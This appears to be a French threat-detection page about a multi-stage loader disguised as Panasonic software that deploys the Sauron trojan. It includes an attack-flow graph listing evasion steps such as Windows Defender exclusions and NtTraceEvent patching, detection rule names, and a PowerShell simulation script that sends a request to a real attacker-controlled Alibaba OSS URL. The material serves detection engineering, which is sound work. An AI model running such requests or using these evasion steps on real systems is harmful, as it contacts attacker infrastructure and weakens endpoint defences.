Suivre 
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Cette menace se concentre sur une chaîne de chargement multi-étapes hautement sophistiquée déguisée en logiciel légitime de Panasonic. Le malware utilise Alibaba OSS pour livrer des charges utiles et s’appuie sur des transporteurs cryptés basés sur des images utilisant un format distinctif de bande finale EOF à cinq octets. Sa dernière étape déploie le cheval de Troie Sauron, qui maintient sa persistance par la création de services et des modifications ciblées du registre.
Enquête
Les analystes ont mené des analyses statiques et dynamiques et ont découvert une séquence d’opérations de chargement secondaire impliquant des exécutables estampillés comme logiciels de Tencent et Philips. L’enquête a révélé une routine de décryptage en couches utilisant un XOR incrémentiel et RC4, ainsi que la création de tâches planifiées via des mécanismes RPC. La criminalistique de la mémoire et la télémetrie de bac à sable ont aidé à reconstituer le parcours complet de l’exécution, depuis l’enveloppe thématisée Panasonic jusqu’au cheval de Troie final Sauron.
Atténuation
Les organisations devraient surveiller la planification de tâches non autorisées à base de RPC et la création suspecte de tâches planifiées via NdrClientCall3. Une liste blanche d’applications rigoureuse peut aider à bloquer l’exécution de DLL chargées de manière non approuvée. Les défenseurs devraient également surveiller les suppressions inattendues de copies d’ombre de volume et les modifications suspectes du registre sous HKCUSOFTWARE.
Réponse
Si cette activité est détectée, isolez immédiatement les systèmes affectés pour stopper tout mouvement latéral ultérieur ou toute communication de commandement et de contrôle. Effectuez une analyse forensique de la mémoire pour identifier les modules injectés et déterminer l’étape actuelle de la chaîne de chargement. Les journaux réseau doivent également être examinés pour le trafic vers l’infrastructure Alibaba OSS et les adresses IP de commandement et de contrôle connues identifiées lors du triage.
graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious[« <b>Action</b> – <b id=’T1204.002’>Exécution par l’utilisateur : Fichier malveillant</b><br/><b>Fichier</b>: ainstaller-86533005.exe<br/><b>Description</b>: L’utilisateur exécute un exécutable trojanisé<br/>déguisé en logiciel de notification PC Panasonic. »] class exec_user_malicious action %% Obfuscation and Masquerading obf_files[« <b id=’T1027’>Fichiers ou Informations Obfusqués</b><br/><b>Technique</b>: Tampons à plusieurs niveaux<br/><b>Mécanisme</b>: Décodage XOR/RC4 personnalisé<br/><b>Extraction</b>: Bande finale EOF à cinq octets à partir de transporteurs d’images. »] class obf_files malware mask_file_type[« <b id=’T1036.008’>Déguisement : Déguiser le Type de Fichier</b><br/><b>Description</b>: Utilisation d’extensions d’image (gif, jpg, png, db)<br/>pour cacher des charges utiles cryptées. »] class mask_file_type evasion %% Proxy Execution proxy_sys_bin[« <b id=’T1218’>Exécution de Proxy Système Binaire</b><br/><b>Cible 1</b>: Tencent UxEnhanceHost chargeant UxEnhance64.dll<br/><b>Cible 2</b>: Hôte Philips/Solutions de Traitement Vocal chargeant XPSPLOG.dll »] class proxy_sys_bin action %% Persistence persist_sched_task[« <b id=’T1053.005’>Tâche/Travail Planifié : Tâche Planifiée</b><br/><b>Module</b>: VirtuOne<br/><b>Mécanisme</b>: Appels RPC au planificateur de tâches via \pipeatsvc<br/><b>Objectif</b>: Créer des tâches répétitives cachées. »] class persist_sched_task persistence %% Defense Evasion evade_def_impair[« <b id=’T1685’>Impairment de Défense</b><br/><b>Action</b>: Patching ntdll.dll!NtTraceEvent »] class evade_def_impair evasion evade_selective_excl[« <b id=’T1679’>Exclusion Sélective</b><br/><b>Outil</b>: PowerShell<br/><b>Commande</b>: Add-MpPreference -ExclusionPath<br/><b>Objectif</b>: Ajouter des exclusions à Windows Defender. »] class evade_selective_excl evasion %% Final Stage proxy_rundll32[« <b id=’T1218.011’>Exécution de Proxy Système Binaire : Rundll32</b><br/><b>Fichier</b>: rundll32.dat<br/><b>Export</b>: Edge<br/><b>Action</b>: Installe et démarre le service malveillant. »] class proxy_rundll32 action malware_sauron[« <b id=’Malware’>Malware : Sauron</b><br/><b>Type</b>: Service Malveillant<br/><b>Capacité</b>: Porte dérobée persistante et lancement de commande. »] class malware_sauron malware %% Connections %% Flow of execution exec_user_malicious –>|déclenche| obf_files obf_files –>|utilise| mask_file_type mask_file_type –>|mène à| proxy_sys_bin proxy_sys_bin –>|active| persist_sched_task persist_sched_task –>|facilite| evade_def_impair persist_sched_task –>|facilite| evade_selective_excl evade_def_impair –>|prépare l’environnement pour| proxy_rundll32 evade_selective_excl –>|prépare l’environnement pour| proxy_rundll32 proxy_rundll32 –>|installe| malware_sauron
Flux d’attaque
Détections
Exécution de Processus Système à partir de Chemins Atypiques (via création de processus)
Voir
Exécution Suspecte depuis un Profil Utilisateur Public (via création de processus)
Voir
Activité Suspecte de VSSADMIN (via ligne de commande)
Voir
Modifications Suspectes des Préférences de Windows Defender (via PowerShell)
Voir
Fichiers Suspects dans un Profil Utilisateur Public (via événement de fichier)
Voir
Détection d’Indicateurs de Réseau de Chaîne de Chargeur Style SilverFox [Connexion Réseau Windows]
Voir
Détection de Chaîne de Chargeur Style SilverFox utilisant un Exécutable Panasonic Trojanisé [Création de Processus Windows]
Voir
Exécution de Simulation
Prérequis : Le Check de Pré-vol de Télémétrie & Baseline doit avoir été validé.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non pertinents mèneront à un diagnostic erroné.
-
Narration de l’Attaque & Commandes : L’adversaire cherche à télécharger une charge utile de deuxième étape en utilisant un service légitime de stockage cloud pour se fondre dans le trafic normal. L’attaquant utilise une commande PowerShell pour simuler un chargeur qui effectue une requête à une URL SilverFox Alibaba OSS connue :
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. Cette action est conçue pour contourner les filtres de domaines simples en tirant parti de la réputation dealiyuncs.comtout en utilisant le chemin malveillant spécifique défini dans la règle de détection. -
Script de Test de Régression :
# Simulation de l'Indicateur Réseau du Chargeur SilverFox # Ce script tente de se connecter à l'URL spécifique surveillée par la règle Sigma. $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] Simulation de connexion réseau SilverFox à : $targetUrl" try { # Utilisation d'Invoke-WebRequest pour générer une télémétrie proxy HTTP standard $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] Requête complétée. Code d'état : $($response.StatusCode)" } catch { # Nous attendons une erreur 404 ou de connexion si l'URL n'héberge pas réellement de fichier, # mais le journal proxy enregistrera quand même la tentative. Write-Host "[-] Tentative de requête. Vérifiez les journaux proxy pour la tentative de connexion." } -
Commandes de Nettoyage :
# Aucune modification persistante effectuée par cette simulation; aucun nettoyage requis. Write-Host "[*] Nettoyage de simulation terminé."